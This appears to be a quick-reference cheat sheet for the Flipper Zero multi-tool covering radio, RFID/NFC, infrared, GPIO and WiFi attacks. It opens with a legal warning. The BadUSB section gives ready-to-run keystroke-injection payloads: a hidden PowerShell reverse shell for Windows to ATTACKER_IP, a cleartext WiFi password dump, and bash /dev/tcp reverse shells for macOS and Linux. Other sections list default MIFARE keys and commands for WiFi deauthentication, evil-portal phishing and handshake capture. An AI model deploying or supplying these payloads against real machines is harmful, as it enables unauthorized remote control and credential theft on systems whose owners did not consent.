Quick Reference

Comprehensive quick reference for the Flipper Zero multi-tool - covering Sub-GHz, RFID, NFC, IR, BadUSB, WiFi devboard, and GPIO.

Legal Warning

The Flipper Zero is a powerful multi-tool. Using it against systems you don't own or have explicit permission to test is illegal in most jurisdictions.

  • Sub-GHz: Transmitting on certain frequencies may violate FCC/radio regulations
  • RFID/NFC: Cloning access cards without authorization is illegal
  • BadUSB: Deploying payloads on systems without consent is computer fraud
  • WiFi Attacks: Deauth attacks and evil portals are illegal without authorization
  • Always obtain written permission before testing

📡 Sub-GHz Attacks

Read SignalSub-GHz → Read
Read RAW (unknown protocols)Sub-GHz → Read RAW
Save Signal[Left] → Save
Transmit SignalSub-GHz → Saved → Emulate
Add ManuallySub-GHz → Add Manually
Frequency AnalyzerSub-GHz → Frequency Analyzer
Delete SignalSaved → [Select] → Delete

📻 Sub-GHz Protocols

CAME12-bit fixed | 433.92 MHz
CAME TWEE54-bit rolling | 433.92 MHz
Nice FLO12-bit fixed | 433.92 MHz
Nice FLOR-S52-bit rolling | 433.92 MHz
Princeton24-bit fixed | 315/433 MHz
Linear10-bit fixed | 310 MHz (US)
Chamberlain9-bit fixed | 315/390 MHz
Security+ 2.0Encrypted rolling | 310-390 MHz
KeeLoq66-bit rolling | Various
Somfy Telis56-bit rolling | 433.42 MHz

🏷️ 125kHz RFID

Read Card125 kHz RFID → Read
Write CardSaved → Write
Emulate CardSaved → Emulate
Add Manually125 kHz RFID → Add Manually

Supported Types:

EM4100, HID Prox, Indala, ioProx, AWID, FDX-B, Paradox, Viking, Jablotron, T5577 (clone target)

📱 NFC (13.56 MHz)

Read CardNFC → Read
Detect ReaderNFC → Detect Reader
Dictionary AttackExtra Actions → MF Classic Dict
Write CardSaved → Write
Emulate CardSaved → Emulate

Supported Types:

MIFARE Classic 1K/4K, MIFARE Ultralight, NTAG213/215/216, DESFire (limited)

✨ Magic NFC Cards

Gen1a (Chinese Magic)Backdoor WUPA, detectable
Gen2 (CUID)Direct block 0 write
Gen3 (APDU)UID+BCC writable, best compat
Gen4 (Ultimate)Shadow mode, GDM/GTU
FUIDOne-time UID write
UFUIDUID writable until locked

🔑 Common MIFARE Keys

Factory DefaultFF FF FF FF FF FF
MAD KeyA0 A1 A2 A3 A4 A5
NDEF KeyD3 F7 D3 F7 D3 F7
TransportA0 B0 C0 D0 E0 F0
All Zeros00 00 00 00 00 00
Infineon4D 3A 99 C3 51 DD
Nokia47 52 4F 4D 49 00

📺 Infrared

Universal RemotesIR → Universal Remotes
Learn SignalIR → Learn New Remote
Save Signal[Left] → Save
TransmitIR → Saved Remotes

Built-in Database:

TVs (Samsung, LG, Sony, Vizio), ACs (Carrier, Daikin, Gree), Projectors, Audio

🦆 DuckyScript Commands

Type textSTRING Hello World
Type + EnterSTRINGLN text here
Wait (ms)DELAY 500
Default delayDEFAULT_DELAY 100
Enter keyENTER
Win+RGUI r
Ctrl+CCTRL c
Alt+F4ALT F4
Tab keyTAB
Repeat lastREPEAT 5
CommentREM Comment here

💀 BadUSB: Windows Reverse Shell

REM Windows Reverse Shell
DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden
DELAY 100
CTRL SHIFT ENTER
DELAY 800
ALT y
DELAY 500
STRING $client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
ENTER

⚠️ Replace ATTACKER_IP with your listener IP

💀 BadUSB: Exfil WiFi Passwords

REM Exfiltrate WiFi Passwords to file
DELAY 1000
GUI r
DELAY 200
STRING powershell -w hidden
CTRL SHIFT ENTER
DELAY 500
ALT y
DELAY 300
STRING (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Out-File $env:TEMP\wifi.txt
ENTER
DELAY 2000
STRING notepad $env:TEMP\wifi.txt
ENTER

🍎 BadUSB: macOS Shell

REM macOS Reverse Shell
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
ENTER
DELAY 200
STRING clear && exit
ENTER

🐧 BadUSB: Linux Shell

REM Linux Reverse Shell
DELAY 1000
ALT F2
DELAY 300
STRING gnome-terminal
ENTER
DELAY 800
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
ENTER
DELAY 200
STRING exit
ENTER

🔌 GPIO & iButton

Read iButtoniButton → Read
Write iButtonSaved → Write
Emulate iButtonSaved → Emulate
USB-UART BridgeGPIO → USB-UART Bridge
GPIO ReaderGPIO → GPIO Reader

Supported: DS1990A, Cyfral, Metakom, RW1990 (write)

📍 GPIO Pinout

Pin 1+5VPin 9C1 (USART TX)
Pin 2A7 (ADC)Pin 10C0 (USART RX)
Pin 5B3 (SPI MOSI)Pin 11B14 (SPI CLK)
Pin 6B2 (SPI MISO)Pin 133.3V
Pin 8GNDPin 181-Wire (iButton)

📶 WiFi Devboard (Marauder)

Launch MarauderGPIO → ESP → WiFi Marauder
Scan APsscanap
Scan Stationsscansta
Select Targetselect -a [INDEX]
Deauth Attackattack -t deauth
Beacon Spamattack -t beacon -l
Rickroll Beaconattack -t rickroll
PMKID Capturesniff pmkid
Stop Attackstopscan

🎯 WiFi Attack Techniques

Evil PortalFake captive portal phishing
Karma AttackAuto-respond to probe requests
Handshake Capturesniff pkt → Save PCAP
Deauth + CaptureForce reconnect for handshake
Probe Sniffsniff probe
Set Channelchannel [1-14]

⚙️ Firmware Options

Officialflipperzero.one/update
UnleashedExtended Sub-GHz, no restrictions
MomentumFork of Xtreme, active dev
RogueMasterMany plugins, games, animations

📊 Firmware Comparison

Feature Official Unleashed Momentum
Sub-GHz RangeLimitedExtendedExtended
Rolling CodesNoYesYes
Extra PluginsFewManyMost
StabilityBestGreatGood
UpdatesSlowFastFast

📦 Useful Apps

WiFi MarauderESP32 WiFi attacks
Evil PortalCaptive portal phishing
UART TerminalSerial debugging
SPI Mem ManagerRead/write SPI flash
NRF24 SnifferMouse/keyboard attacks
Spectrum AnalyzerView RF spectrum
TPMS ReaderTire pressure sensors
Pocsag PagerPager message decode

📁 File Management

USB Mass StorageSettings → Storage
qFlipper (Desktop)flipperzero.one/update
Mobile AppiOS/Android via Bluetooth
Sub-GHz FilesSD/subghz/*.sub
NFC FilesSD/nfc/*.nfc
RFID FilesSD/lfrfid/*.rfid
IR FilesSD/infrared/*.ir
BadUSB ScriptsSD/badusb/*.txt

🔧 Troubleshooting

No SD CardFormat as FAT32, <256GB
Sub-GHz No ReadCheck antenna, move closer
NFC Won't ReadCenter card on back exactly
BadUSB FailsCheck keyboard layout (US_qwerty)
Screen IssuesSettings → LCD → Contrast
Battery DrainDisable Bluetooth when not used
DFU ModeHold ← + Back during boot
Reset to StockFlash via qFlipper DFU